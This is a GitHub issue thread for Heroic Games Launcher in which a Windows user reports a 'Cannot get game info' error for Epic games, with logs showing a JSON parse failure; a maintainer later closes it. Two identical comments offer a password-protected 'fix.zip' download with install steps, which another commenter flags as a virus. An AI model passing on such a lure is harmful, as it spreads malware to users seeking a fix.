### ISSUE TITLE
Heroic: Cannot get game info from any game from within my Epic Games library

### ISSUE THREAD

**Issue by KaleidonKep99** [Heroic-Games-Launcher/HeroicGamesLauncher#3984]
### Describe the bug

Whenever I try to install any Epic Games game from within Heroic, it fails to and prompts me with a "Cannot get game info" screen.

### Add logs

```text
(05:25:41) INFO:    [Legendary]:        Legendary location: C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary
(05:25:41) INFO:    [Gog]:              GOGDL location: C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl
(05:25:41) INFO:    [Connection]:       Connectivity: check-online
(05:25:41) INFO:    [Connection]:       Pinging external endpoints
(05:25:41) INFO:    [Gog]:              Checking for existing gog manifests
(05:25:41) WARNING: [Backend]:          Protocol already registered.
(05:25:42) INFO:    [Connection]:       Connectivity: online
(05:25:42) ERROR:   [Gog]:              Unable to syncQueued playtime, userData not present
(05:25:42) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\bri\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"auth`""
(05:25:42) INFO:    [Frontend]:         Refreshing undefined Library
(05:25:42) WARNING: [Backend]:          refresh not implemented on Sideload Library Manager
(05:25:42) INFO:    [Legendary]:        Refreshing library...
(05:25:42) INFO:    [Legendary]:        Refreshing Epic Games...
(05:25:42) INFO:    [Backend]:          Frontend Ready
(05:25:42) INFO:    [Backend]:          Checking for new Heroic Updates
(05:25:42) INFO:    [Backend]:          Checking for current version changelog
(05:25:42) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"list`"","`"--third-party`""
(05:25:43) INFO:    [Backend]:          VCRuntime is installed
(05:25:44) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(05:25:44) INFO:    [Gog]:              Running command: GOGDL_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\gogdlConfig powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\gogdl`"" -Wait -NoNewWindow -ArgumentList "`"--auth-config-path`"","`"C:\\Users\\bri\\AppData\\Roaming\\heroic\\gog_store\\auth.json`"","`"--version`""
(05:25:44) INFO:    [Nile]:             Running command: NILE_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\nile_config powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\nile`"" -Wait -NoNewWindow -ArgumentList "`"--version`""
(05:25:44) INFO:    [WineDownloader]:   Updating wine versions info
(05:25:44) INFO:    [WineDownloader]:   Fetching upstream information...
(05:25:45) INFO:    [WineDownloader]:   wine versions updated
(05:25:45) ERROR:   [Backend]:          Could not find default wine version
(05:25:46) INFO:    [Backend]:          
System Information:
CPU: 24x AMD Ryzen 9 5900X 12-Core Processor            
Memory: 34.27 GB (used: 14.99 GB)
GPUs:

OS: Unknown Windows Version 10.0.22631 (win32)

The current system is not a Steam Deck
We are not running inside a Flatpak container

Software Versions:
  Heroic: 2.15.1 Emeth
  Legendary: 0.20.35 Lowlife (Heroic)
  gogdl: 1.1.1

I love Snek <3
  comet: comet 0.1.2

  Nile: 1.1.1 Will A. Zeppeli


I love Snek <3

(05:25:47) INFO:    [Legendary]:        Game list updated, got 174 games & DLCs
(05:25:47) WARNING: [Backend]:          listUpdateableGames not implemented on Sideload Library Manager
(05:25:47) INFO:    [Legendary]:        Checking for game updates: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"list`"","`"--third-party`""
(05:25:47) INFO:    [Backend]:          Starting the Download Queue
(05:25:50) INFO:    [ExtraGameInfo]:    Using cached ExtraGameInfo data for Fortnite
(05:25:50) INFO:    [ExtraGameInfo]:    Using cached ExtraGameInfo data for Fortnite
(05:25:50) INFO:    [Legendary]:        Getting more details with 'legendary info'
(05:25:50) INFO:    [Legendary]:        Getting more details with 'legendary info'
(05:25:50) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"info`"","`"Fortnite`"","`"--json`"","`"--platform`"","`"Windows`""
(05:25:50) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"info`"","`"Fortnite`"","`"--json`"","`"--platform`"","`"Windows`""
(05:25:51) WARNING: [Legendary]:        Failed to parse games from C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary\installed.json with: Error: ENOENT: no such file or directory, open 'C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary\installed.json'
    at Object.readFileSync (node:fs:448:20)
    at Object.t.readFileSync (node:electron/js2c/node_init:2:10245)
    at Module.Ka (C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:114:3340)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)
    at C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:184:2384
    at WebContents.<anonymous> (node:electron/js2c/browser_init:2:83537)
(05:25:51) INFO:    [Legendary]:        Found 0 games to update
(05:25:51) INFO:    [Legendary]:        Getting more details with 'legendary info'
(05:25:51) INFO:    [Legendary]:        Getting more details with 'legendary info'
(05:25:51) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"info`"","`"Fortnite`"","`"--json`"","`"--platform`"","`"Windows`""
(05:25:51) INFO:    [Legendary]:        Running command: LEGENDARY_CONFIG_PATH=C:\Users\bri\AppData\Roaming\heroic\legendaryConfig\legendary powershell Start-Process "`"C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar.unpacked\build\bin\x64\win32\legendary`"" -Wait -NoNewWindow -ArgumentList "`"info`"","`"Fortnite`"","`"--json`"","`"--platform`"","`"Windows`""
(05:25:57) ERROR:   [Legendary]:        Error: Failed to parse install info for Fortnite with: SyntaxError: Unexpected non-whitespace character after JSON at position 5701 (line 2 column 1)
    at Module.En (C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:114:2826)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)
    at C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:184:4032
    at WebContents.<anonymous> (node:electron/js2c/browser_init:2:83537)
(05:25:57) ERROR:   [Legendary]:        Error: Failed to parse install info for Fortnite with: SyntaxError: Unexpected non-whitespace character after JSON at position 5701 (line 2 column 1)
    at Module.En (C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:114:2826)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)
    at C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:184:4032
    at WebContents.<anonymous> (node:electron/js2c/browser_init:2:83537)
(05:25:57) ERROR:   [Legendary]:        Error: Failed to parse install info for Fortnite with: SyntaxError: Unexpected non-whitespace character after JSON at position 5701 (line 2 column 1)
    at Module.En (C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:114:2826)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)
    at C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:184:4032
    at WebContents.<anonymous> (node:electron/js2c/browser_init:2:83537)
(05:25:57) ERROR:   [Legendary]:        Error: Failed to parse install info for Fortnite with: SyntaxError: Unexpected non-whitespace character after JSON at position 5701 (line 2 column 1)
    at Module.En (C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:114:2826)
    at processTicksAndRejections (node:internal/process/task_queues:95:5)
    at C:\Users\bri\AppData\Local\Programs\heroic\resources\app.asar\build\main\main.js:184:4032
    at WebContents.<anonymous> (node:electron/js2c/browser_init:2:83537)
(05:25:57) ERROR:   [Frontend]:         Cannot get game info
(05:25:57) ERROR:   [Frontend]:         Cannot get game info
(05:25:57) ERROR:   [Frontend]:         Cannot get game info
(05:25:57) ERROR:   [Frontend]:         Cannot get game info
(05:25:57) ERROR:   [Frontend]:         Cannot get game info
(05:26:02) ERROR:   [Frontend]:         Cannot get game info
```

### Steps to reproduce

1. Go to Library
2. Click on any game from the Epic Games library
3. Wait for it to fail to load the info

### Expected behavior

It should load the info and allow me to install it.

### Screenshots

![image](https://github.com/user-attachments/assets/dbad6de7-12fd-4254-917f-19560c94447b)
![image](https://github.com/user-attachments/assets/da7a1af1-9d9e-402a-848b-93be0a498b99)

### Heroic Version

Latest Stable

### System Information

- OS: Windows 11 23H2

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by youzi-2333** [comment]
Don't download this file! This is a computer virus.

**Comment by juicebox777** [comment]
I'm having the same problem. Any luck?

**Comment by arielj** [comment]
check if there's any error in Settings > Logs > Epic/Legandary

**Comment by arielj** [comment]
Closing, as it's been over a year since my last comment here
